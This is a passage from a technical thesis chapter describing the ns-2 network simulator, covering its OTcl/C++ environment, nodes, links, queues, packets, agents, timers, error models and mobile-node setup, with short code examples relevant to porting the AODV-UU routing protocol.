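            if (ipq_message_type(buf) == IPQM_PACKET) {
                ipq_packet_msg_t *m = ipq_get_packet(buf);
                /* This sketch simply lets every packet pass. */
                ipq_set_verdict(h, m->packet_id, NF_ACCEPT, 0, NULL);
            }
        }
        ipq_destroy_handle(h);
        return 0;
    }

In AODV-UU the corresponding logic lives in the libipq and packet_queue modules, with the verdict decided by packet_input after consulting the internal routing table.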
Chapter 5 The ns-2 Network Simulator

5.1 Introduction

The network simulator ns-2 [8] is an object-oriented, discrete event-driven network simulator developed at UC Berkeley and USC ISI as part of the VINT project [41]. It is a very useful tool for conducting network simulations involving local and wide area networks, and its functionality has grown during recent years to include wireless networks and ad-hoc networking as well. The ns-2 network simulator has gained enormous popularity in the research community, mainly because of its simplicity and modularity. It allows simulation scripts, also called simulation scenarios, to be easily written in a script-like programming language, OTcl. More complex functionality relies on C++ code that either comes with ns-2 or is supplied by the user. This flexibility makes it easy to enhance the simulation environment as needed, although most common parts are already built-in, such as wired nodes, mobile nodes, links, queues, agents (protocols) and applications. Most network components can be configured in detail, and models for traffic patterns and errors can be applied to a simulation to increase its realism. There even exists an emulation feature, allowing the simulator to interact with a real network.

Simulations in ns-2 can be logged to trace files, which include detailed information about packets in the simulation and allow for post-run processing with some analysis tool. It is also possible to let ns-2 generate a special trace file that can be used by NAM (Network Animator), a visualization tool that is part of the ns-2 distribution. This allows simulations to be replayed on screen, which can be useful for complex simulations. A large amount of documentation exists for ns-2, including a reference manual [40], several tutorials such as [56], and an ns-users mailing list [57].

The intention of this chapter is to provide an overview of the ns-2 network simulator and to illustrate the usage of some of its network components, in particular those that are important for the porting of AODV-UU described in Chapter 6. For this reason, the sections on agents and mobile networking have been given a substantial amount of space. Finally, the descriptions of trace file formats later in the chapter complement the almost non-existent documentation on this topic found in the ns-2 manual.

The version of ns-2 described here is version 2.1b9, and the ns-2 distribution used is the ns-allinone distribution, version 2.1b9. The notation ns followed by a path and a filename refers to the corresponding file in the ns-2 source code tree. The complete source code of ns-2 is available from the ns-2 homepage [8].

5.2 Performing simulations

The starting point for performing simulations in ns-2 is to build an OTcl simulation scenario script file that specifies the components to be used and the events that should occur. An example scenario could e.g. set up a network topology consisting of two nodes, connect these two using a 10 Mbps duplex link, set up FTP traffic over TCP, and start and stop this traffic at certain points in time.

Main building blocks

In general, a simulation scenario consists of three main components:

A network topology
Connections, traffic and agents (protocols)
Events and failures

A network topology defines the number of nodes and their connectivity, and can either be created manually or with special topology generators such as GT-ITM [42]. Connections and traffic are set up by traffic generators and agents (protocols) at a node.
Events and failures include connection set-ups/tear-downs, packet flow, packet loss, congestion and mobile node movements Simulation scenario contents The contents of most simulation scenario scripts follow a certain pattern. This is due to the fact that some general setup is common to almost all scenarios. A typical simulation scenario script will include (in order): Creation of a simulator instance. A simulator instance is needed for any simulation to be performed. Opening of trace files, both a normal trace file and a NAM (Network Animator) trace file. Configuration of nodes, i.e., setting of parameters that will be used when nodes are created. Creation of nodes and links, and connection of nodes using these links. Creation of agents and applications, and attachment (installation) of these. Scheduling of traffic-related events, e.g. starting or stopping of a traffic generator or agent. A finish procedure to be called at the end of simulation. This procedure should flush any trace file output and exit the simulator. Scheduling of a call to the finish procedure at the end of the simulation. Starting of the simulation, by issuing a run command to the simulator instance Simulation execution and analysis A simulation scenario script is executed (i.e., a simulation is performed) by supplying the file name on the command line to the ns-2 simulator. The simulator acts as an OTcl interpreter, interpreting the simulation scenario script line by line. Any error messages or messages generated by the script will be printed to the console. When the simulation has finished, the simulator exits and the command shell prompt returns. No graphical user interface is supplied with ns-2 for performing simulations. After successfully performing a simulation, the trace files that may have been produced by the simulation scenario script can be analyzed. Depending on the objectives of the simulation, this can either be done with a full-fledged analysis tool such as Trace graph [43] or with simpler, hand-made scripts (usually Perl, sed or awk scripts) or programs. 5.3 The OTcl/C++ environment To increase flexibility and efficiency, ns-2 uses two programming languages for its operation; C++ and OTcl. C++ is mainly used for event handling and per-packet processing; tasks for which OTcl would become too slow. OTcl is commonly used for simpler routing protocols, general ns-2 code and simulation scenario scripts. The usage of OTcl for simulation scenario scripts allows the user to change parameters of a simulation without having to recompile any source code. 28 38 The two programming languages are tied together in the sense that C++ objects can be made available to the OTcl environment (and vice versa) through an OTcl linkage. This linkage creates OTcl objects for C++ objects and allows variables of C++ objects to be shared as well. In addition, it offers access to the OTcl interpreter from C++ code. This makes it possible to implement network components in OTcl, C++ or both. Furthermore, these components can easily be configured from the simulation scenario script because of the OTcl linkage, so the choice of programming language used for the implementation is completely transparent to the user. 5.4 Class hierarchy To provide a better understanding of the characteristics of network components in ns-2, a partial ns-2 class hierarchy is shown in Figure 5.1. 
Figure 5.1: Partial ns-2 class hierarchy. TclObject is the root, with NsObject below it; the basic network components divide into the Connector branch (e.g. SnoopQueue, Queue with DropTail and RED, Delay, Agent with TCP and UDP, Trace) and the Classifier branch (e.g. AddrClassifier, McastClassifier).

The root of the hierarchy is the TclObject class, which is the superclass of all library objects in OTcl, i.e., schedulers, network components, timers and other objects. The NsObject class forms a superclass for all basic network component objects that handle packets. Basic network components may be combined to form more complex network objects such as nodes and links. The basic network components are divided into two subclasses, Connector and Classifier, based on the number of possible output data paths. Basic network components with only one output data path are placed under the Connector class, while switching objects that have multiple possible output data paths instead are placed under the Classifier class.

5.5 Event scheduling

Event scheduling in ns-2 is handled by a discrete event scheduler, used e.g. by simulation scenario scripts and network components that simulate packet-handling delays or use timers for their operation. There are two different types of event schedulers: real-time and non-real-time schedulers. The real-time scheduler RealTime is used for emulation, i.e., live interaction between the simulator and a real network. For non-real-time purposes, the three schedulers List, Heap and Calendar are available, of which the Calendar scheduler is the default. These mainly differ in the way that they store events, yielding different time complexities.

An event scheduler keeps track of the time, an event ID and a handler for each event. When an event should be carried out, the specified handler is called, as shown in Figure 5.2. Handlers in this context are handler methods of C++ objects of the Handler class. Events are executed to completion one by one, i.e., no preemption is supported. If several events are scheduled to occur at the same time, they are executed in a first-scheduled, first-dispatched manner.

Figure 5.2: Discrete event scheduling in ns-2. The event scheduler calls the handler function of a network component at the specified time of the event.

Event scheduling is indirectly made available to network components of ns-2 through the use of timers, described in section 5.12, or through access to an instance of the OTcl interpreter, as mentioned in section 5.3. Simulation scenario scripts may schedule events through the simulator instance by using the at <time> "<OTcl command>" command.

5.6 Packet delivery

Packet delivery in ns-2 is built on the concept of network objects (components) interacting with each other. Packets are generated e.g. by agents or traffic generators, and delivered through links from one node to another. In each step of the packet delivery process, a network object sends the packet using a send method, which invokes the recv (receive) method of another network object (target_->recv(p, h)). This is shown in Figure 5.3.

Figure 5.3: Packet delivery in ns-2. A network object sends a packet to another network object by invoking its receive method.

For packet delivery to take place, a reference to the receiving network object is needed. This, however, is not a problem.
All plumbing-work involving network objects is performed in the simulation scenario script, and hence, all references to network objects are known.

5.7 Nodes

Nodes are fundamental in a simulation. They perform processing and forwarding of packets, and are therefore perhaps the most important entities among all network components of ns-2. This section mainly deals with unicast nodes that have a wired connection to the network; wireless nodes are described in section 5.15, and details on multicast nodes can be found in [40].

Node basics

A wired unicast node is a compound object composed of a node entry object and two classifiers, as shown in Figure 5.4. The node entry is where packets first arrive. The address classifier examines the address field of a packet to determine whether the packet is destined for the current node. Finally, the port classifier determines which agent (protocol) at the node should receive the packet.

Figure 5.4: Composite construction of a wired unicast node.

If the packet is not destined for the current node, the address classifier determines which node the packet should be forwarded to. This is possible because routing functionality in the node constantly updates the address classifier. Packets are forwarded to other nodes through links to these nodes.

Node configuration and creation

Prior to creating nodes, the desired node configuration must be given to the simulator instance. This is done by issuing a node-config command to the simulator instance, and passing the configuration options as arguments. Table 5.1 lists some of the available options for node configuration. If no configuration is made, default values apply, i.e., it is assumed that wired nodes with a flat addressing scheme (where nodes are simply numbered from zero and up) should be used.

Table 5.1: Selected options for node configuration. A dash (-) indicates that the value is not set by default.

Option            Available values                                    Default
-addressType      flat, hierarchical                                  flat
-wiredRouting     ON, OFF                                             OFF
-llType           LL, LL/Sat                                          -
-macType          Mac/802_11, Mac/Csma/Ca, Mac/Sat,                   -
                  Mac/Sat/UnslottedAloha, Mac/Tdma
-ifqType          Queue/DropTail, Queue/DropTail/PriQueue             -
-ifqLen           <length>                                            -
-phyType          Phy/WirelessPhy, Phy/Sat                            -
-adhocRouting     DIFFUSION/RATE, DIFFUSION/PROB, DSDV, DSR,          -
                  FLOODING, OMNICAST, AODV, TORA
-propType         Propagation/TwoRayGround, Propagation/Shadowing,    -
                  Propagation/FreeSpace
-propInstance     Propagation/TwoRayGround, Propagation/Shadowing     -
-antType          Antenna/OmniAntenna                                 -
-channel          Channel/WirelessChannel, Channel/Sat                -
-topoInstance     <topology file>                                     -
-mobileIP         ON, OFF                                             OFF
-rxPower          <value in W>                                        -
-txPower          <value in W>                                        -
-idlePower        <value in W>                                        -
-agentTrace       ON, OFF                                             OFF
-routerTrace      ON, OFF                                             OFF
-macTrace         ON, OFF                                             OFF
-movementTrace    ON, OFF                                             OFF
-IncomingErrProc  <error model instantiator>                          -
-OutgoingErrProc  <error model instantiator>                          -

To illustrate the node-config command, an example configuration of a wireless ad-hoc node is shown below:

    ... -topoInstance $topo \
        -channel Channel/WirelessChannel \
        -agentTrace ON \
        -routerTrace ON \
        -macTrace ON \
        -movementTrace ON

After performing node configuration, nodes may be created by issuing a node command to the simulator instance. This command creates a node using the current node configuration options.
If nodes with different characteristics are needed, the node configuration procedure may be repeated, and more nodes created.

5.7.3 Node addressing

Node addresses in ns-2 consist of two parts: node IDs and port IDs. Both are 32-bit fields, which together constitute a complete address. Two addressing modes are available that determine how addresses should be interpreted. In flat addressing, each node gets assigned a node ID at the time of creation, starting from zero and increasing. This means that the addressing scheme simply becomes a node numbering scheme without any further interpretation of addresses. In hierarchical addressing, the node ID is instead divided into different hierarchy levels, with a specific number of bits used for each level. The node addressing mode is configured using the node-config command of the simulator instance.

5.7.4 Routing

Routing in nodes is performed by routing modules, consisting of a routing agent, route logic and classifiers. Routing agents exchange routing packets with neighbors, route logic uses the information gathered by routing agents to perform the computation of a route, and classifiers use the computed routing table to carry out the actual packet forwarding.

A routing module initializes its connection to a node by registering itself to the node with a special registration command. During this registration, the routing module tells the node whether it is interested in knowing about route updates and transport agent attachments, and creates and installs classifiers inside the node. Currently, there are six routing modules available. These are listed in Table 5.2.

Table 5.2: Available routing modules

RtModule/Base      Interface to unicast routing protocols. Provides basic functionality
                   to add/delete routes and attach/detach agents.
RtModule/Mcast     Interface to multicast routing protocols. Establishes multicast
                   classifiers.
RtModule/Hier      Hierarchical routing. A wrapper for managing hierarchical classifiers
                   and route installation.
RtModule/Manual    Manual routing, i.e., manual addition and deletion of routes.
RtModule/VC        Uses a virtual classifier instead of a vanilla classifier for
                   forwarding packets.
RtModule/MPLS      Implements MPLS (Multi-Protocol Label Switching) routing.

5.8 Links

A link is a compound object composed of a sequence of connectors, as shown in Figure 5.5. Connectors, unlike classifiers, only generate data for one recipient; either the packet is delivered to the target (output) of the connector, or it is dropped to a drop target.

[Figure 5.5: Composite construction of a uni-directional link]

Links are defined by five instance variables. head_ is the entry point to the link, pointing to the first object in the link. queue_ is a reference to the main queue element of the link. Although simple links only contain one queue, more complex links may have multiple queues. link_ is a reference to the element that actually models the link, giving it its delay and bandwidth characteristics, and ttl_ is a reference to the element that manipulates the TTL field in every packet. Finally, drophead_ is a reference to an object that is the head of a queue of elements that process link drops.

Links also allow packets to be monitored more closely. By using the trace-all command of the simulator instance (see section 5.18), trace elements enqt_ and deqt_ are added to track when a packet is enqueued or dequeued from queue_.
Also, drpt_ allows dropped packets to be traced, and rcvt_ allows packets to be traced at the end of a link.

Creation and configuration of links is provided by the simulator instance. By issuing a simplex-link command to the simulator instance, a simplex link is created between two nodes with certain bandwidth, delay and queue type characteristics. Similarly, duplex links are created with the duplex-link command.

To model connectivity changes, links offer a dynamic mode that is selected by issuing a dynamic command. After this command has been issued to a link, the status of that link can be changed by issuing up and down commands. In dynamic mode, links also offer an up? command for checking the status of a link. The cost for a packet to traverse a link, which defaults to 1, can be set using the cost command. This value is used by the route logic of routing modules when calculating routes. Other useful commands for links include errormodule, which inserts an error model before the queue element of a link to model errors in packets, and insert-linkloss, which inserts an error model after the queue element of a link to model link loss. Error models and their installation are described further in section 5.14.

5.9 Queues

Queues are objects that hold or drop packets, and are used e.g. in links and interface queues in wireless networking. Currently, ns-2 includes support for drop-tail (FIFO) queueing, RED buffer management, class-based queueing and several variants of fair queueing. Some of the available queue types are listed below, along with their respective OTcl class names.

Queue/DropTail queues implement simple FIFO queues. A subclass of this queue type, PriQueue, allows packets to be prioritized based on their packet type.
Queue/FQ queues implement fair queueing.
Queue/SFQ queues implement stochastic fair queueing.
Queue/DRR queues implement deficit round robin scheduling, and support multiple flows.
Queue/RED queues implement random early-detection gateways, which can be configured to either mark or drop packets.
Queue/CBQ queues implement class-based queueing, in which packets can be associated with traffic classes based on their IP header flow IDs.

5.10 Packets

Packets are the fundamental unit of exchange between objects in a simulation. They are built up of packet headers, corresponding to different protocols that may be used, and packet data. Access to the different packet headers and the data portion of a packet is made available through access methods. This is shown in Figure 5.6. New protocols may add their own packet header types to the available ones, and unused packet headers may be turned off to save memory during simulations.

[Figure 5.6: Packet contents. Each packet is built of packet headers and packet data.]

Packet types and headers

Packet types are defined in ns/common/packet.h. An enumeration of packet types is provided by the packet_t enumeration, and a p_info class provides the mapping to packet type names:

enum packet_t {
        PT_TCP,
        ...
        PT_NTYPE
};

class p_info {
public:
        p_info() {
                name_[PT_TCP] = "tcp";
                ...
                name_[PT_NTYPE] = "undefined";
        }
};

At the beginning of a simulation, the available packet types are reviewed by the PacketHeaderManager OTcl class to assign each packet type a unique offset in packets.
This offset is stored in a static offset_ variable of each packet header class, and is used by the access() methods of these classes to provide a 35 45 pointer into the packet where that packet header begins. Usually, packet header classes also supply access macros to simplify packet header access even further. Unused packet headers may selectively be disabled by issuing a remove-packet-header command in OTcl before any simulator instance is created. For large simulations with lots of traffic, this could save a considerable amount of resources (most notably, memory) The common header The only mandatory packet header in ns-2 is the common header, hdr_cmn, mainly used for tracing packets and measuring other quantities during a simulation. The most important fields of this header are: ptype_, the packet type. uid_, a unique packet ID. size_, the simulated packet size. ts_, the timestamp of the packet. This field is used for queue delay measurements. error_, an error flag indicating whether the packet is corrupted or not. errbitcnt_, the number of corrupted bits in the packet. direction_, the direction of the packet during network stack traversal. prev_hop_, the address of the previous hop. Used for hop-by-hop routing in wireless simulations. next_hop_, the address of the next hop. Used for hop-by-hop routing in wireless simulations. num_forwards_, the number of times that a packet has been forwarded (used in wireless simulations). iface_, the label of the receiving interface. The ptype_ field is used for packet type identification in trace logs, making them easier to read. The uid_ field is used by the scheduler for scheduling packet arrivals. The size_ field specifies the size of a simulated packet in bytes. It is used for computing the time it takes for a packet to be delivered over a link, and should therefore be set to be the sum of the sizes of application data, IP-, transport- and application-level headers. The error_ and errbitcnt_ fields are used for indicating the degree of packet corruption. The direction_ and next_hop_ fields are particularly important in wireless simulations. Finally, the iface_ field is used by the simulator when performing computations of multicast distribution trees, and indicates on which link a packet was received Packet allocation and de-allocation Packets are allocated on demand by calling the alloc() method of the Packet class. This reserves memory for a new packet, and returns a pointer to the packet. However, when packets are de-allocated using the free() method of the Packet class, they are not removed from memory but instead stored on a private list of free packets, to be reused when subsequent packet allocations are requested. This avoids memory fragmentation Agents Agents represent endpoints where packets are generated or consumed, and are used for implementing protocols at various layers. Routing agents and traffic sinks are some examples of agents that are frequently used in simulations. The OTcl class Agent and the C++ Agent class together implement agents in ns-2. The source code can be found in ns/common/agent.{cc, h} and ns/tcl/lib/ns-agent.tcl. Here, we will consider C++ agents only, since OTcl packet handling generally is not recommended (due to performance issues). 36 46 Agent state information Each agent holds a certain amount of state information, mainly to be able to assign default values to packet fields when generating packets, and to identify itself. Table 5.3 shows the state information kept for each agent. 
Table 5.3: Agent state information

agent_addr_    Address of this agent
agent_port_    Port number of this agent
dst_addr_      Address of destination agent
dst_port_      Port number of destination agent
type_          Packet type
size_          Packet size (in bytes)
ttl_           Default IP TTL value
fid_           IP flow identifier
prio_          IP priority field
flags_         Packet flags

Agent packet methods

Agents offer two methods for generating packets, Packet *allocpkt() and Packet *allocpkt(int). These methods allocate space for a new packet, and assign default values to its packet fields using the state information of the agent. The latter method also makes room for a data payload.

Packets may be sent out with the void send(Packet *p, Handler *h) method, which hands them to the default target of the agent. Usually, this is the node entry of the node that the agent is attached to. Packet reception is available through a void recv(Packet *p, Handler *h) method, which will receive all packets destined for the agent. The handler argument is usually ignored by agents.

Agent attachment

Agents are attached to nodes by issuing an attach-agent <node> <agent> command to the simulator instance. This installs an agent in the port classifier of the node, using the agent's designated port number, agent_port_. After attaching an agent to a node, the agent will receive all packets destined for it, i.e., all packets whose port number matches the port number of the agent. The delivery of packets to agents is carried out by the port classifier of a node.

Routing agents are somewhat special, since they require more steps to be installed in a node. For instance, routing agents should usually be installed as the default target of the address classifier of a node to perform forwarding of packets. Such installation details are taken care of by existing OTcl support code (e.g. during node creation), and are not described here.

Connecting agents

To allow two agents attached to different nodes to communicate, the simulator instance offers a connect <src> <dst> command for connecting them with each other. This command sets the destination address and destination port of one agent to be the address and port of the other agent (and vice versa). This arranges for communication between the two agents. However, the nodes to which the agents are attached must also be connected to each other, e.g. by a duplex link.

Application attachment

Agents allow applications to be attached on top of them. For this purpose, ns-2 offers a simple API for interaction between agents and applications. However, this API lacks support for passing data between applications; it only offers notifications of received data and completed data transmission to the application. Hence, the application API is only used by relatively simple applications, such as traffic generators, FTP applications and Telnet applications. This API shortcoming has also resulted in agents partially taking over the role of applications. That is, when custom packet processing functionality is to be implemented in a node, that functionality is often put into an agent.

Creating a new agent

When creating a new agent, e.g. a routing agent, a number of steps have to be followed in order to make the agent available to the ns-2 environment. The following steps are fundamental:

- The inheritance structure of the agent should be decided on. The Agent class forms a foundation for agents, but multiple inheritance may be desired, depending on the functionality of the agent.
- The void recv(Packet *p, Handler *h) procedure for packet reception should be defined.
- Any necessary timer classes should be defined if the agent utilizes timers for its operation. The void timeout(int tno) method of the Agent class may be overridden to provide a custom timeout method; it is empty and unused by default. More information on timers can be found in section 5.12.
- OTcl linkage functions should be defined to allow agent usage from the OTcl environment of ns-2.
- The source code of the agent must be incorporated into the source code tree of ns-2, and ns-2 recompiled for the changes to take effect.

OTcl linkage

Linkage of the agent to the OTcl environment is performed in three steps. First, a mapping between the OTcl name space and the name of the agent class must be established. This is done by creating a static TclClass class instance whose constructor registers the name of the agent class with OTcl, and allows for creation of the agent:

static class ExampleAgentClass : public TclClass {
public:
        ExampleAgentClass() : TclClass("Agent/Example") {}
        TclObject *create(int argc, const char*const* argv) {
                return (new ExampleAgent());
        }
} class_example;

This allows the agent to be instantiated from OTcl. Next, binding of variables should be performed to allow these to be accessed from the OTcl environment. This is done by using the bind() method:

ExampleAgent::ExampleAgent() : Agent(PT_EXAMPLE)
{
        bind("packetsize_", &size_);
}

In this example, the size_ variable of the ExampleAgent class is bound so that it becomes accessible from OTcl as packetsize_. Values of bound variables are automatically kept consistent between the C++ and OTcl environments. The argument to the constructor of the Agent base class is the packet type that should be used by the agent when generating packets.

Finally, the agent should be capable of receiving commands from the OTcl environment, e.g. to start or stop the agent or to modify its behavior in other ways. This is done by overriding the Agent::command() method:

int ExampleAgent::command(int argc, const char*const* argv)
{
        if (argc == 2) {
                if (strcmp(argv[1], "start") == 0) {
                        startagent();
                        return TCL_OK;
                }
        }
        // Unknown command
        return (Agent::command(argc, argv));
}

Here, three things should be noted:

- The number of arguments passed to the command() method is one more than the number of arguments passed to the agent instance by the OTcl simulation scenario script. If the agent is given a start command by issuing $agent start from OTcl, the command() method of the agent will receive not one but two arguments, of which the first one is cmd. This must be considered when checking the argument count and extracting parameters from the argument array.
- A special return value, TCL_OK or TCL_ERROR, must be returned by the command() method. This provides the OTcl interpreter with information on the status of the command. If TCL_OK is returned, execution of the OTcl simulation scenario script continues as usual, but if TCL_ERROR is returned, the simulator will exit with an error message pointing out where things went wrong.
- If the agent cannot handle the command given to it through the command() method, it should pass the argument count and arguments on to the Agent base class for processing. The agent should return the return value of the Agent::command() method.

Compilation

For the agent to become available to ns-2, its source code must be integrated into the ns-2 source code tree, and ns-2 recompiled.
This is preferrably done by modifying the Makefile.in file of ns-2, which serves as a template for the configure tool of the system when it creates a Makefile for compilation on that specific system. The target object (.o) files of the agent should be added among the other compilation prerequisites, so that the agent is compiled together with the rest of the ns-2 source code. Finally, configure should be run from the ns-2 directory with Makefile.in in it to produce a new Makefile. Running make should then recompile the necessary parts of the ns-2 source code tree, and include support for the newly created agent Timers Timers are used by agents and other objects in ns-2 for keeping track of delays and performing periodic executions of program code. They may be implemented in either C++ or OTcl, and rely on the scheduler of ns-2 for their notion of time. In this section, we will consider C++ timers only. The source code can be found in ns/ common/timer-handler.{cc, h}. For C++ timers, the abstract base class TimerHandler should be used. A void expire(event *e) method must be defined by subclasses, containing the code to be performed when the timer expires. Additional 39 49 tweaking of timer behavior is available by overriding the void handle(event *e) method, which normally consumes the timer event, calls expire(), and sets the status of the timer appropriately. Timers of the TimerHandler class offer the following functionality through public member functions: void sched(double delay) schedules the timer to expire delay seconds in the future. void resched(double delay) reschedules the timer to expire delay seconds in the future. In contrast to the sched() method, the timer may be pending. void cancel() cancels the timer (if it is pending). int status() returns the current status of the timer, i.e., one of TIMER_IDLE, TIMER_PENDING and TIMER_HANDLING. Since timers are frequently used by agents, it is very common to see constructors of timer classes taking a pointer to an agent as an argument. This pointer can be stored by the timer and later dereferenced to gain access to methods of that agent class. Similarly, timer classes are often made friends of an agent class to allow them to access protected methods which otherwise would be inaccessible Traffic generators Traffic generators are special applications that generate simulated network traffic. They should be attached to a transport agent, e.g. a TCP agent, for sending the generated traffic. Currently, four traffic generators are available: Application/Traffic/Exponential generates bursts of traffic, with burst and idle times of exponential distributions. Application/Traffic/Pareto generates bursts of traffic, with burst and idle times of pareto distributions. Application/Traffic/CBR generates constant bit-rate traffic, allowing the bit rate and packet size to be configured. Application/Traffic/Trace is used for generating traffic based on trace files from existing simulations. This traffic generator selects a random starting place in the trace file, from which it begins to generate traffic Error models Error models are connectors, used for introducing link-level packet errors or packet loss into a simulation. Errors are modeled by setting the error_ flag of packets, and packet loss is modeled by dropping packets to a drop target. Some of the most common error models are described below. The source code can be found in ns/ queue/errmodel.{cc, h}. ErrorModel: This is the base error model. 
It allows the unit of error to be changed to bits or packets, and the random variable for error probability to be specified. If a drop target has been set, it will receive all corrupted packets. Otherwise corrupted packets are passed on to the target of the error model, allowing errors to be handled at the receiving node. Multi-state error model: This error model uses state transitions for changing between different error models. Such transitions occur according to a transition state model matrix, specifying the probabilities of switching from one error model to another. 40 50 Two-state error model: This error model introduces errors (or not), depending on the current state of the error model. List error model: This error model drops packets or bytes based on their sequence numbers. Periodic error model: This error model switches between errors and no errors periodically. SelectErrorModel: This error model drops packets of a certain type when the unique ID of a packet has a value with a certain offset from a cycle value Usage in wired networks To use an error model in a wired network, it has to be inserted into a simple link. Since simple links are compound objects, error models may be inserted at several different places: Before the queue of the link. This can be done either with the errormodule <errmod> method of a simple link, which inserts the error model right before the queue of the link and sets the drop target of the error model to be the drop target of the link, or with the lossmodel <errmod> <src> <dst> method of the simulator instance, which inserts the error model into the simple link between the specified source and destination. After the queue of a link, but before the delay element. This can be done either with the insertlinkloss <args> method of a simple link or the link-lossmodel <errmod> <src> <dst> method of the simulator instance. These two methods work just like the errormodule and lossmodel methods described above, except for the placement of the error model. After the delay element of a link. This can be done with the install-error method of the Link class. This currently does not produce any trace, but is included for future extensions Usage in wireless networks In wireless networks (described in section 5.15), error models can be applied both to incoming and outgoing network traffic on a wireless channel. The error models are placed between the network interface and the MAC layer of the network stack, and allow incoming and outgoing packets to be corrupted independently. Installation of error models in a wireless node is performed through the node-config command of the simulator instance, as described in section More specifically, the parameters -IncomingErrProc and -OutgoingErrProc to the node-config command should specify OTcl methods that return error model instances, as shown below. proc ExampleErrProc{} { set err [new ErrorModel] $err set rate_ 0.01 $err drop-target [new Agent/Null] return $err } $ns_ node-config -IncomingErrProc ExampleErrProc \ -OutgoingErrProc ExampleErrProc set node1_ [$ns_ node] set node2_ [$ns_ node]... In this example, a standard ErrorModel instance is created for both the incoming and outgoing wireless channel of each node, with a packet error rate of one percent. Corrupted packets will be sent to a null agent that discards them, instead of to the MAC layer or network interface (depending on the packet direction). 
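For a wired topology, a corresponding sketch using the lossmodel method described above could look as follows (this assumes the standard ErrorModel configuration commands unit and ranvar, and that the nodes n0 and n1 and the link between them already exist):

set em [new ErrorModel]
$em unit pkt                            ;# drop whole packets (rather than bits)
$em set rate_ 0.01                      ;# one percent packet loss
$em ranvar [new RandomVariable/Uniform] ;# random variable for error decisions
$ns_ lossmodel $em $n0 $n1              ;# insert before the queue of the n0->n1 link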
5.15 Mobile networking

Mobile networking in ns-2 is based on the mobility extensions [44] developed by the CMU Monarch group [45]. These extensions introduce the notion of mobile nodes connected to wireless channels, and allow for simulation of wireless networks and ad-hoc networks.

Mobile nodes

A mobile node is a node with extra functionality to adapt it to mobile networking. Figure 5.7 shows the schematics of a mobile node, with an additional agent attached (for packet generation and processing).

[Figure 5.7: Schematics of a mobile node in ns-2]

The most important difference between wired nodes and mobile nodes is that mobile nodes are connected to wireless channels for their communication, whereas wired nodes are connected by links. Also, mobile nodes may be moved within a topography, as opposed to wired nodes which remain stationary. The mobile node itself is a compound object, built from the following parts:

- An address classifier used for handing packets to the port classifier or routing agent. The default target of the address classifier is often the routing agent, to allow for packet forwarding.
- A port classifier, used for handing packets to agents attached to the mobile node.
- A routing agent for routing table management and packet forwarding. The routing agent should set the next_hop_ field of packets to indicate their next-hop destination.
- A link layer responsible for converting network addresses to hardware addresses (with the help of an ARP module, see below) and preparing packets to be put onto a wireless channel.
- An ARP module that resolves network addresses to hardware (MAC) addresses.
- An interface queue, used for storing packets that should be sent out.
- A MAC layer for managing access to the wireless channel.
- A network interface that sends and receives packets over the wireless channel.
- A radio propagation model determining the signal strength of received packets, and hence, whether a packet can be received by a network interface or not.
- A wireless channel over which packets are distributed.

Packet transmission

Packets are transmitted by a mobile node in the following way. The packet is first generated by an agent or a traffic source at the mobile node. Each generated packet is delivered to the entry of the mobile node, i.e., the address classifier. This classifier determines if the packet was destined for the current node, or if it should be forwarded. Packets that should be forwarded are handed to the routing agent of the mobile node through a default target of the address classifier. The routing agent processes the packet, fills in the next_hop_ field of the packet, and passes it down to the link layer.

The link layer translates the destination address into a hardware (MAC) address, by letting an ARP module generate ARP requests, process ARP replies and fill in the MAC header of the packet. The packet is then handed down to the interface queue, which holds packets that should be transmitted. The length of the interface queue can be specified, and depending on the queue type used, routing protocol control packets can be prioritized. The MAC layer retrieves packets from the interface queue when appropriate, i.e., when the wireless channel is free to use.
Packets are handed to the network interface, which puts the packet onto the wireless channel. Copies of the packet are then delivered to all network interfaces attached to the channel, at the time when a packet would start arriving in a physical system (i.e., based on the speed of light and the distance between nodes). However, this does not necessarily mean that the packet can be correctly received by all of them; radio propagation models determine this at the time of packet reception Packet reception When a packet is received by a network interface attached to a wireless channel, the network interface consults a radio propagation model for determining whether the packet can be correctly received or not. The settings of the network interface and the selected radio propagation model affect this (see sections 5.16 and 5.17). If a packet is correctly received, it is handed to the MAC layer by the network interface. The MAC layer hands the packet to the link layer, which in turn hands the packet to the entry of the mobile node, i.e., the address classifier. The address classifier checks the destination address of the packet to see if it matches the address of the current node. If it does, the packet is handed to the port classifier. Otherwise, the packet is handed to a default target usually the routing agent for further processing and possible forwarding. The port classifier hands the packet to an agent attached to the mobile node, based on the port number contained in the packet. This completes the packet delivery. 43 53 Simulation scenario setup The setup of a simulation scenario with mobile nodes differs somewhat from a simulation scenario with wired nodes. The following steps should be performed, in addition to those of section 5.2.2, to create a simulation with mobile nodes: Wireless tracing should be enabled for NAM (Network Animator) to track movements of mobile nodes. This is described in section A topography must be defined, to confine the area in which mobile nodes may move. A flat grid topography with dimensions x times y metres is created with the following code: set topo [new Topography] $topo load_flatgrid $x $y The topography instance should be passed to the mobile node with the -topoinstance option of the node-config command (see section 5.7.2). Optionally, a third argument may be passed to the load_flatgrid command; the resolution of the grid. The default resolution is 1. A GOD (General Operations Director) object must be created. It annotates trace logs with information about the optimal number of hops from a source to a destination, used for statistics and routing protocol evaluations. A GOD object is created with the following code (nn is the total number of nodes in the simulation, and must be specified): set god_ [create-god $nn] If desired, the Queue/DropTail/PriQueue queue (commonly used as an interface queue) can be set to prioritize routing protocol control packets. This is done by changing the value of its Prefer_ Routing_Protocols variable: Queue/DropTail/PriQueue set Prefer_Routing_Protocols 1 The physical characteristics of the network interface should be set, along with configuration of the MAC layer to suit the simulation. This is decribed in section Mobile node configuration and creation Mobile nodes are configured and created as usual by issuing the commands node-config and node to the simulator instance. 
